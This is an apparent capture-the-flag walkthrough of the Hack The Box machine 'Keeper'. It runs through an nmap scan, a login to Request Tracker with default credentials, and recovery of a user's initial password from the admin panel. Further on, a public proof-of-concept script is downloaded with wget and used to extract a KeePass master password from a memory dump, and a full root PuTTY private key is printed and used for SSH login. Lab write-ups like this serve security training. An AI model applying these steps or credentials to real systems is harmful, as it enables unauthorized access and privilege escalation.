Keeper

# Nmap 7.93 scan initiated Tue Aug 22 01:27:53 2023 as: nmap -p22,80,8000 -sV -sC -T4 -oA keeper-nmap keeper.htb
Nmap scan report for keeper.htb (10.10.11.227)
Host is up (0.069s latency).

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3539d439404b1f6186dd7c37bb4b989e (ECDSA)
|_  256 1ae972be8bb105d5effedd80d8efc066 (ED25519)
80/tcp   open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0 (Ubuntu)

Open Ports :

  • port 22 ssh

  • port 80 web htttp

Port 80 redirected to another subdomain

# add it to /etc/hosts
10.10.11.227    keeper.htb tickets.keeper.htb

Google request tracker default credential

root : password

Admin -> User -> Select (To list all users)

lnorgaard : New user. Initial password set to Welcome2023!
root

  • Hinted the user is from Danish

foothold

ssh lnorgaard@keeper.htb

listing directory

total 332820
-rwxr-x--- 1 lnorgaard lnorgaard 253395188 May 24 12:51 KeePassDumpFull.dmp
-rwxr-x--- 1 lnorgaard lnorgaard      3630 May 24 12:51 passcodes.kdbx
-rw-r--r-- 1 root      root       87391651 Aug 21 21:02 RT30000.zip
-rw-r----- 1 root      lnorgaard        33 Aug 21 19:55 user.txt

  • We are hinted that is is vulnerable to KeePass CVE

  • dmp suggest that it might be vulnearble to memory dump CVE

Priv Esc

#Run locally 
wget https://raw.githubusercontent.com/CMEPW/keepass-dump-masterkey/main/poc.py

#Run on user lnorgaard
wget http://your_ip:8000/poc.py

Execution

python3 poc.py ~/htb/keeper/KeePassDumpFull.dmp 

2023-08-22 02:28:38,864 [.] [main] Opened /home/kali/htb/keeper/KeePassDumpFull.dmp

Possible password: ●,dgr●d med fl●de
Possible password: ●ldgr●d med fl●de
Possible password: ●`dgr●d med fl●de
Possible password: ●-dgr●d med fl●de
Possible password: ●'dgr●d med fl●de
Possible password: ●]dgr●d med fl●de
Possible password: ●Adgr●d med fl●de
Possible password: ●Idgr●d med fl●de
Possible password: ●:dgr●d med fl●de
Possible password: ●=dgr●d med fl●de
Possible password: ●_dgr●d med fl●de
Possible password: ●cdgr●d med fl●de
Possible password: ●Mdgr●d med fl●de

Google the masterkey password

https://letmegooglethat.com/?q=%E2%97%8F%2Cdgr%E2%97%8Fd+med+fl%E2%97%8Fde
Did you mean: [●,**_rodgrod_** med **_flode_**]

https://letmegooglethat.com/?q=%E2%97%8F%2Crodgrod+med+flode

rødgrød med fløde

Open passcode.kdbx wtih KeePass

nano putty-key

Group: Network. Title: keeper.htb (Ticketing Server). User Name: root. Password: ********. Creation Time: 5/19/2023 1:36:50 AM. Last Modification Time: 5/24/2023 3:48:21 AM.

PuTTY-User-Key-File-3: ssh-rsa
Encryption: none
Comment: rsa-key-20230519
Public-Lines: 6
AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D
8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81T
EHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LM
Cj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1Tu
FVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQ
LxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et
Private-Lines: 14
AAABAQCB0dgBvETt8/UFNdG/X2hnXTPZKSzQxxkicDw6VR+1ye/t/dOS2yjbnr6j
oDni1wZdo7hTpJ5ZjdmzwxVCChNIc45cb3hXK3IYHe07psTuGgyYCSZWSGn8ZCih
kmyZTZOV9eq1D6P1uB6AXSKuwc03h97zOoyf6p+xgcYXwkp44/otK4ScF2hEputY
f7n24kvL0WlBQThsiLkKcz3/Cz7BdCkn+Lvf8iyA6VF0p14cFTM9Lsd7t/plLJzT
VkCew1DZuYnYOGQxHYW6WQ4V6rCwpsMSMLD450XJ4zfGLN8aw5KO1/TccbTgWivz
UXjcCAviPpmSXB19UG8JlTpgORyhAAAAgQD2kfhSA+/ASrc04ZIVagCge1Qq8iWs
OxG8eoCMW8DhhbvL6YKAfEvj3xeahXexlVwUOcDXO7Ti0QSV2sUw7E71cvl/ExGz
in6qyp3R4yAaV7PiMtLTgBkqs4AA3rcJZpJb01AZB8TBK91QIZGOswi3/uYrIZ1r
SsGN1FbK/meH9QAAAIEArbz8aWansqPtE+6Ye8Nq3G2R1PYhp5yXpxiE89L87NIV
09ygQ7Aec+C24TOykiwyPaOBlmMe+Nyaxss/gc7o9TnHNPFJ5iRyiXagT4E2WEEa
xHhv1PDdSrE8tB9V8ox1kxBrxAvYIZgceHRFrwPrF823PeNWLC2BNwEId0G76VkA
AACAVWJoksugJOovtA27Bamd7NRPvIa4dsMaQeXckVh19/TF8oZMDuJoiGyq6faD
AF9Z7Oehlo1Qt7oqGr8cVLbOT8aLqqbcax9nSKE67n7I5zrfoGynLzYkd3cETnGy
NNkjMjrocfmxfkvuJ7smEFMg7ZywW7CBWKGozgz67tKz9Is=
Private-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0

Convert PuTTY to OpenSSH

sudo apt install putty-tools

puttygen putty-key -O private-openssh -o id-rsa-keeper-root

chmod 600 id-rsa-keeper-root

  • The reason you need to convert a PuTTY .ppk private key to a PEM format (.pem file) before using it with the ssh -i command is due to the differences in key formats used by PuTTY and OpenSSH.

  • In nutshell : Windows uses PuTTY but linux use OpenSSH

root

ssh -i id-rsa-keeper-root root@keeper.htb
PreviousBankNextHelp

Last updated